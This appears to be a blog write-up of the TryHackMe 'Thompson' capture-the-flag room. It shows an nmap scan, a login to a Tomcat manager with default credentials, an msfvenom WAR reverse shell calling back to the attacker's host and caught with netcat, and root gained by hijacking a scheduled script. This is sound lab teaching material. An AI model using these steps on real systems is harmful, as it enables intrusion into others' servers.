Thompson (Tryhackme) Room Writeup By Jonty Bhardwaj
Hello Reader, I am Jonty Bhardwaj currently enrolled in Master Certificate in Cyber Security HackerU program. Today I am here to share a writeup on a Tryhackme machine called Thompson.
Now first of all we will navigate to the Room URL and join it.
After starting the Machine we will first connect through Open VPN and ping the machine through the IP we are given to see if the connection is established. After we are successful in pinging the machine, we will start the fun part which is Pentesting and getting root privilege.
Now first we will start a Nmap scan to see what are the ports and services open on the machine.
nmap -sV -sT -T4 10.10.126.40
Now we can see that 3 ports are open and the most promising port we can gather info looks to be port 8080. Lets see what’s on the website there.
On the main website of you try to open server status it gives us a login form , we left the login form empty as we didn’t know any credentials. We were directed to a new webpage with some credentials written on it.
According to this webpage we found the credentials to be
Username : tomcat
Password : s3cret
We opened the manager link on the webpage to see what functionalities we could manage . We got a login form on which we used the acquired credentials — tomcat and s3cret as username and password.
On seeing the information on the page carefully we know that’s its Tomcat Application Manager through which we can manage the applications on the webserver and functionalities.
Here the most interesting thing which caught our eye was that we can upload a WAR file on the server and maybe we can exploit it and try to upload a reverse shell on the server and get a shell back.
We now created a war reverse shell using Msfvenom.
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.8.107.42 LPORT=4444 -f war -o web.war
We then uploaded this war reverse shell on the server .
As you can see, we have successfully uploaded the war reverse shell , we have to run out listener on our kali machine.
nc -lnvp 4444
Now its time to run the reverse shell on the server and get a shell back on our listener.
We just click on the war file on the server and the reverse shell is activated and we got a shell back on our listner.
Lets search the system and find the user flag first .
We first used the python pty command to upgrade the shell .
python -c “import pty; pty.spawn(‘/bin/bash’)”
We found the user flag in the jack user directory.
Now lets try to escalate our privilege to root and get the root flag.
Looking around we see that there is a shell script which is running automatically and it has got all permissions . We could use this script to copy the root.txt flag from root into our jack user directory.
echo “cp /root/root.txt /home/jack/root.txt” > id.sh
Now we have to wait for the script to execute itself and check regularly if the root.txt flag is copied or not.
And after some time the script has been executed and we have copied the root.txt flag into our jack directory.
And like this we have got our final flag . Congratulations !
Here we have successfully escalated to root shell after using the exploit command and found the root flag .
Proof of Completion
Congratulations on completing the room and reading the blog . Hope my blog helped you in your journey and made you learn something new .
Happy Hacking !!